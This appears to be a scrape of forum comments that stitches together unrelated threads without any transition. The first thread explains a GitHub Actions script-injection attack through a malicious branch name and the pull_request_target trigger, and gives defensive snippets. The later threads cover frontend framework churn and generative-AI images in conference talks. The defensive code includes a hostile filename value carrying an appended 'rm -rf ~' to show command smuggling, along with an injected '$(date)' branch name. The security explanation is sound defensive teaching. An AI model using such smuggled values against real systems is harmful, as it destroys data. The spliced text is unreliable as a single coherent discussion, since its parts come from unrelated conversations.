I haven’t heard about it before it was suggested in this thread, I’m going to give it a try.
I use Groovy at $DAILYJOB, and am currently learning Ruby (which has a lot more job listings than Elixir). The appeal of both languages is the same: it is incredibly easy to design DSLs with them (basically what Jenkins and Gradle use), which is precisely what I work with at $DAILYJOB. The fact that it’s JVM-based is the icing on the cake, because it’s easy to deploy in the clients’ environments.
Dagger looks interesting for this sort of use case: https://dagger.io/
This looks really interesting, thanks for the pointer! Maybe it’s already good for the things I want to do and I don’t need to make anything at all, or maybe I can contribute something to it.
That’d be lovely.
The generation of devs that grew up on Jenkins (including myself) got used to seeing CI as “just” a bunch of shell scripts. But it’s tedious as hell, and you end up programming shell via yaml, which makes me sympathetic to vulns like these.
Yeah in dealing with github’s yaml hell I’ve been wishing for something closer to a typed programming language with a proper library e.g. some sort of simplified-haskell DSL à la Elm, Nix, or Dhall.
They all do? They all provide ways to build specific branches defined in yaml files, or even via UIs, rather than leaving that work to your shell scripts. Personally I find all those yaml meta-languages inferior to just writing a shell script. And for one and a half decades I’ve been looking for an answer to the question:
What’s the value of a CI server other than running a command on commit?
But back to your point. Why? What you need to do is sanitize user input. That is completely independent of whether it’s a shell script or another language. Shell scripts are actually higher level than general-purpose programming languages.
I’m certainly not saying that one doesn’t need to sanitize user input.
But I want the underlying system to provide a baseline level of safety. Like in Python: unless I’m calling `eval()`, it doesn’t matter that some input may contain the character sequence `os.system(...)`; and if I’m not calling `os.system()` and friends, it doesn’t matter if a string has `rm -rf` in it. When absolutely any data may end up being executed as code at any time, the system has a problem, if you ask me.
Buildbot also belongs on the list of “systems old enough to predate YAML-everywhere”. It certainly has its weaknesses today, but its config is Python-based.
In GitHub Actions specifically, there’s also a very straightforward fix: instead of interpolating a string in the shell script itself, set any values you want to use as env vars and use those instead. e.g.:
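```yaml
# A representative example; GitHub's own hardening guide recommends
# this pattern.
- env:
    BRANCH_NAME: ${{ github.head_ref }}
  # $BRANCH_NAME is expanded by the shell as data at run time, instead
  # of being pasted into the script text by the Actions runner.
  run: echo "Building branch $BRANCH_NAME"
```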
I don’t think string replacement systems are bad per se. Sure, suboptimal in virtually all senses. But I think the biggest issue is a lack of good defaults and a requirement to explicitly indicate that you want the engine to do something unsafe. Consider the following in GH Actions:
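```yaml
# A minimal sketch of the comparison: these two look nearly identical,
# but only the second splices untrusted text into the script itself.
- run: echo "ref: $GITHUB_HEAD_REF"
- run: echo "ref: ${{ github.head_ref }}"
```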
I do not see any major difference immediately. Compare to Pug (nee Jade):
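```pug
//- Sketch with a hypothetical `userComment` variable: `=` escapes by
//- default; the single extra `!` is the explicit opt-in to raw output.
p= userComment
p!= userComment
```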
Using an unescaped string directly is clear to the reader and is not possible without an opt-in. At the same time, the opt-in is a matter of a single-char change, so one cannot decry the measure as too onerous. The mantra should be to make unescaped string usage explicit (and discouraged by default).
But to escape a string correctly, you need to know what kind of context you’re interpolating it into. E.g. if you’re generating a YAML file with string values that are lines of shell script, you might need both shell and YAML escaping in that context, layered correctly. Which is already starting to look less like string interpolation and more like serialization.
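A quick Python sketch of that layering, using JSON for the outer layer (JSON is a subset of YAML):

```python
import json    # JSON output is also valid YAML
import shlex   # POSIX-shell quoting

filename = "o'brien; rm -rf ~"                 # hostile "data"

shell_line = "cat " + shlex.quote(filename)    # layer 1: escape for the shell
yaml_value = json.dumps(shell_line)            # layer 2: escape for YAML
print(yaml_value)                              # safe to embed as a YAML scalar
```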
Over a decade ago (jesus, time flies!) I came up with an ordered list of approaches in descending order of safety. My main mantra was “structural safety”: instead of ad-hoc escaping, try to fix the problem in a way that completely erases injection-type security issues structurally.
I’m reminded of my similar post focused more on encoding (from the same year! hooooboy).
Good post! I’m happy to say that CHICKEN (finally!) does encoding correctly in version 6.
Serialize, don’t sanitize… I love it! I’m gonna start saying this.
AFAIU, the echoing is not the problem, and sanitizing wouldn’t help.
The problem is that before the script is even executed, parts of its code (the `${{ ... }}` stuff) are string-replaced.
Yeah. The problem is that the echo command interprets things like `${{...}}` and executes it. Or is it the shell that does it in any string? I’m not even sure, and that is the problem. No high-level language does that. Javascript uses `eval`, which is already bad enough, but at least you can’t use it inside a string. You can probably do `hello ${eval(...)}` but then it is clear that you are evaluating the code inside.
The `${{...}}` are replaced by the GitHub CI system before the echo is even run: https://docs.github.com/en/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions#understanding-the-risk-of-script-injections
It’s the shell that evaluates `$...` syntax. `$(cmd)` executes `cmd`, `${VAR}` reads the shell variable `VAR`, and in both cases the shell replaces the `$...` with the result before calling the echo program with it. Echo is just a dumb program that spits out the arguments it’s given.
Edit: but the `${{` syntax is GitHub Actions’ own syntax; the shell doesn’t see that, as GH Actions evaluates it before running the shell command.
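To make the two layers concrete, a sketch:

```yaml
- env:
    WHO: world
  run: |
    # Layer 1: the Actions runner rewrites the script text itself, so
    # with a branch named `$(date)` the next line becomes: echo "$(date)"
    echo "${{ github.head_ref }}"
    # Layer 2: the shell expands ${VAR} and $(cmd) at run time, as usual.
    echo "hello ${WHO}, kernel: $(uname -s)"
```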
Oh thanks for explaining!
The part I don’t get is how this is escalated to the publish, that workflow only seems to run off of the main branch or a workflow dispatch.
cf. https://lobste.rs/s/btagmw/maliciously_crafted_github_branch_name#c_4z3405 — it seems they were using the pull_request_target event, which grants the PR’s CI access to repo secrets, so they could not only inject the miner but publish a release?
Does anyone have a copy of the script so we can see what it did?
Funny that they managed to mine only about $30 :)
Honestly, shining a spotlight on this attack with a mostly harmless crypto miner is a great outcome.
Less obvious key-stealing malware probably would have caused far more pain.
I knew crypto would have great use cases eventually
The `pull_request_target` event that was used here is privilege escalation similar to sudo – it gives you access to secrets etc.
Like all privilege escalation code, this should be very carefully written, fuzzed, and audited. Certainly a shell script is exactly wrong – sh was never designed to handle untrusted input in sensitive scenarios. Really it’s on GitHub Actions for making shell-script-based privilege escalation the easy path.
At the very least you want to use a language like Rust, leveraging the type system to carefully encapsulate untrusted code, along with property-based testing/fuzzing for untrusted inputs. This is an inherently serious, complex problem, and folks writing code to solve it should have to grapple with the complexity.
Wow. I was looking for that kind of explanation and hadn’t found it yet. Thank you for finding and sharing it.
No, the lesson is to never use bash, except to start something that is not bash.
Oh, this is probably a better top level link for this post!
This is the offending PR
https://github.com/ultralytics/ultralytics/pull/18018
A bot made the PR? How does that work?
I don’t know if it was a bot or not (but that is probably irrelevant). The problem in the PR lies in the branch name, which caused arbitrary code to execute during the GitHub Actions run. Sorry if I misunderstood your question.
Hm, the dots don’t connect for me yet. I can just make a PR with changes to the build process, and CI would test it, but that should be fine, because PRs run without access to secrets, right?
It’s only when the PR is merged and CI is run on the main branch that secrets are available, right?
So would it be correct to say that the PR was merged into main, and, when running CI on the main branch, something echoed the branch name of recently-merged PR?
Ah, I am confused!
See https://stackoverflow.com/questions/74957218/what-is-the-difference-between-pull-request-and-pull-request-target-event-in-git
There’s a way to opt in to triggering a workflow with main-branch secrets when a PR is submitted, and that’s exactly what happened here.
I don’t get why this option exists!
Why would you ever want to expose your secrets to a pull request on an open source project? Once you do that, they’re not actually secrets, they’re just … weakly-obscured configuration settings. This is far from the first time this github “feature” has been used to attack a project. Why do people keep turning it on? Why hasn’t github removed it?
If I understand it correctly, I can maybe see it being used in a non-public context, like for a company’s internal CI.
But for open source and public repos it makes no sense. Even if it’s not an attack like in this case, a simple “echo …” makes the secrets no longer secret.
Prioritizing features over security makes total sense in this context! This was eloquently formulated by @indygreg about Actions:
> You clearly want them to be as powerful as possible!
Note that the version of the workflow that’s used is the one in the target branch, not the one in the proposed branch.
There are legitimate use cases for this kind of privilege escalation, but GHA’s semiotics for it are all wrong. It should feel like a Serious, Weighty piece of code that should be carefully validated and audited. Shell scripts should be banned, not the default.
Thanks for the explanation; I was literally about to post a question to see if I understood it correctly. I am absolutely paranoid about the Actions running on my GitHub repos; it would seem to me that a closed PR should not be involved in any workflow. While the branch name was malicious, is there also a best practice to pull out here for maintainers?
Don’t ever use the `pull_request_target` trigger, and, if you do, definitely don’t give that CI job creds to publish your stuff.
The root cause here is not shell injection. The root cause is that untrusted input gets into a CI run with creds at all. Of course, GitHub Actions doesn’t do that by default; you have to explicitly opt into this with `pull_request_target`. See the linked SO answer in a sibling comment, it explains the issue quite nicely.
Ah, the comment by Foxboron clarifies that what happened here is not the job directly publishing malicious code, but rather poisoning the build cache to make the main branch CI pull bad data in! Clever! So, just don’t give any permissions to `pull_request_target` jobs!
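And, belt and suspenders, you can strip the job’s token of all permissions so that even a compromised run can’t do much (standard GitHub Actions syntax):

```yaml
# Give the GITHUB_TOKEN nothing by default; grant per-job what's needed.
permissions: {}

jobs:
  test:
    runs-on: ubuntu-latest
    permissions:
      contents: read
    steps:
      - uses: actions/checkout@v4
      - run: make test
```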
My public repos don’t run CI jobs for PRs automatically, it has to be manually approved. I think this is the default. Not sure what happened in this case though.
By default it has to be approved for first-time contributors. Not too hard to get an easy PR merged in and get access to auto-running them.
It is totally fine to run CI on PR. CI for PRs does not get to use repository secrets, unless you go out of your way to also include secrets.
If you think your security depends on PRs not triggering CI, then it is likely that either:
- your workflows hand PR jobs secrets they don’t get by default, or
- your PR jobs run on non-sandboxed self-hosted runners.
GitHub’s “don’t run CI for first-time contributors” has nothing to do with security and has everything to do with using the maintainer’s human judgement to protect GitHub’s free runner compute from being used for mining crypto.
That is, this is a feature to protect GitHub/Microsoft, not your project.
Should be easily solvable by billing those minutes to the PR creator.
I guess there is also the situation where you provide your own runner rather than buying it from Github. In that case it seems like a reasonable precaution to restrict unknown people from using it.
Yes! I sympathize with GitHub for having to implement something here on short notice when this happened the first time, but I am dismayed that they never got around to implementing a proper solution: https://matklad.github.io/2022/10/24/actions-permissions.html
Yes, the security with self-hosted runners is different. If you use non-sandboxed self-hosted runners, they should never be used for PRs.
Thank you, that’s a great summary, and a very interesting attack vector.
It’s strange (to me) that a release would be created off of an arbitrary user created branch, but I’m sure there’s a reason for it. In years and years of working with build automation I’ve never thought about that kind of code injection attack, so it’s something I’ll start keeping in mind when doing that kind of work.
Frontend technologies are relatively new compared to their backend counterparts and are still developing, thus in constant flux. What you’re experiencing is, ridiculous as it may sound, a revolution. That’s why the APIs change so much: we’re still figuring this out. I have to admit it’s a lot of churn, but it’s necessary for a better future.
My suggestion would be to either choose a boring and stable alternative, e.g. Ember, or stay on the current major and push against the FOMO. Switching to htmx works well too, albeit a large refactor IMO, with tradeoffs that may be too much depending on project requirements.
Is it, though? Frontend is basically doing, these days, the work that a GUI toolkit used to do on desktop, since frontend developers have decided to reject the platform-native toolkit and implement their own, using it only as a low-level rendering target. You do see some churn in desktop GUI toolkits, but nothing like in web frontend.
Most stewards of desktop GUI frameworks did a decent job of backwards compatibility. Not always great, but you didn’t worry about it to this extent.
It’s easy to lose that historical context when the claim that “it’s different this time!” resounds so often.
Fair point, and since I have zero experience in native UI development I can’t say much. But lately I’ve seen React influence mobile development, such as SwiftUI and Jetpack Compose, which must’ve meant some churn for mobile devs, and suggests there was room for innovation.
I will agree Android development churns about as much as Web frontend development. I was thinking more about desktop UIs, which have been a lot more stable. You can run Win32 apps from the late 90s on modern Windows, and I believe you could mostly rebuild them without changes. You can rebuild NextStep apps for modern MacOS with very few changes.
I’ve heard that Windows is legendary in terms of backwards compatibility, probably due to enterprise customers they have.
“With very few changes” depends on how many changes you consider to be very few. The author complains about Tanstack Query, but v5 comes with a codemod that does the job for you.
While I haven’t done any desktop app development, I’ve heard that retained-mode graphics (which I gather is the default for desktop toolkits) is harder to develop with, and I’m glad the industry has started to adopt immediate-mode graphics.
There’s your answer. The second someone needs a production web app for a business they’re going to be looking more fondly at React.
For small-to-medium sized projects with 1-2 developers, it doesn’t really matter what tech stack is chosen.
The maintenance burden is what matters. The last thing I want to be doing when I finally get back to a personal project is fight with the hip system of the moment, update dependencies with breaking changes, find out there is no replacement for one lib I’m using and it’s abandoned / no longer compiles if I update dependencies it shares with other libs, etc.
I want to come back months later and be able to work on a personal project, not spend my fleeting time maintaining it. Tech stack here matters.
It’s insane to me that people accept the BS work of keeping up with the version treadmill. Don’t you want to be doing things other than fiddling with code that was working fine yesterday?
I think many developers feel that any code containing bugs (or that hasn’t seen an update in some period of time) is a potential exploit, and that the only thing to do is constantly update the code. Yes, I want to do things other than fiddle with code that was working fine yesterday, but I think that’s (sadly) a minority position these days.
Edit: remove sarcastic remark.
This is exactly what I was trying to convey with my article!
At least from my experience Go+HTMX+Templ allows me to do this.
Less dependency management pain = more fun time programming my personal project
Any chance you could write a more detailed article about your stack, how you use, and how it all fits together?
Yes, I am considering this, since multiple people gave me the same feedback.
I didn’t go into too much detail about the Go+HTMX+Templ stack because I wanted to keep the blog post short and focus exclusively on the topic of dependency management.
I’m maintaining a React app at work in production and am looking fondly at htmx, lol. The whole React stack has a bonkers level of complexity. The constant flow of upgrades and security vulns. The evolving ‘best practices’ every couple of years. The Node and npm breakages. Having to move away from the deprecated CRA to Vite and Vitest. The list goes on.
Maybe?
At my previous job we switched away from React to HTMX for our less rich Web UIs (think portals in HTMX vs. real-time positioning displays in React).
Not directly related to this talk, but..
Is it just me? When I see genAI content in a talk, I get wary about how much effort was put into it. Is the whole talk generated? How much of it was generated by a robot? Can it be trusted?
I am biased against genAI, due to having many artist friends. I don’t think the speaker here has done anything wrong, really; they’re just using the tools they have, I suppose.
But there’s this nagging feeling that something is off, the same way generated content always looks slightly off, and it’s hard to trust it because of that.
It’s not just you. I think the way we’ve typically assessed the quality of human to human communication at a first approximation leans heavily on the relative expense of signaling: is the talk grammatically correct, laid out well visually, flows well, etc. All of these things point to “the speaker spent some time outlining their thoughts in a cohesive manner, so the content could be worthwhile.”
Then there’s genAI images, where you type what you want, and it spits out something in 1 minute, ready to use. Totally messes with our heuristic outlined above. Except it has nothing to do with the content itself! As a counter-point: we probably wouldn’t have an issue with a meme, despite it being easy to locate and put in.
We’ve all read posts where the images and content were clearly AI-written. I think we’re just adapting to the idea that parts of something could use AI in the process without compromising the content.
It’s funny how these signalling issues mirror some of the older issues from my childhood. I have cerebral palsy, and there was resistance in the ’80s and ’90s to allowing me to submit my homework assignments typed instead of handwritten.
Removing these external signals would give me an unfair advantage over other students. Thankfully, I only had one teacher who refused to budge on the issue due to his philosophical idealism.
I’m not saying any of this as a supporter of AI (e.g. I don’t use any LLM in my own coding work). I’m mostly just finding it funny the way that history rhymes.
At least in your example, the input is from your brain, the output just looks different.
In the genAI case, the input is not really what you say, but some soup of copy-pasted stuff from scraped material, and then that pretends to be human output.
in particular, if we ignore the spellchecker point:
- printed text is lower entropy than handwritten text, but the information that is there is all intentional; whereas
- an AI-generated image comprises not much more information than the prompt that generated it, but the presentation is burdened with noise; a human-made image contains high entropy but little noise
*nod* I’m reminded of a great article named Targeted Advertising Considered Harmful that goes into the biological signalling theory (i.e. peacock tails) angle.
The introduction of targeted advertising made online ads in general worthless as a signal to the potential customer that the vendor wasn’t a fly-by-night scam.